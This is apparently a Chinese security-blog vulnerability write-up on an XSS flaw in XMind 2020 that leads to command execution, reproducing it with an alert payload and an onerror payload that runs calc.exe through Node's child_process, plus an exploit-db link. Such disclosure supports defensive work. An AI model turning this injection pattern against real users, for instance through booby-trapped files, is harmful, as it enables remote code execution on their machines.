XMIND存在XSS执行RCE漏洞

  • A+
所属分类:安全漏洞
△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface [前言/简介]

2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。

XMIND存在XSS执行RCE漏洞



0x01 复现环境

XMind 2020 202101070032(官网目前提供的下载版本)

XMIND存在XSS执行RCE漏洞

XMIND存在XSS执行RCE漏洞






0x02 漏洞复现
正常弹框payload:<img src=1 onerror=alert("1")>,注意,需要按下功能键才能触发。

XMIND存在XSS执行RCE漏洞


弹计算器payload:
<img src=# onerror="require('child_process').exec('calc.exe',null);">

XMIND存在XSS执行RCE漏洞


linux版本参考:
https://www.exploit-db.com/exploits/49827





0x03 修复建议

下载的windows版本就是最新的版本,至于修复建议,请谨慎打开xmind防止钓鱼。

参考链接:https://mp.weixin.qq.com/s/JCj4yPN5ORGt1WGc7gpuDQ


END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

XMIND存在XSS执行RCE漏洞

或添加NOVASEC-MOYU 以便于及时回复。

XMIND存在XSS执行RCE漏洞


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):XMIND存在XSS执行RCE漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: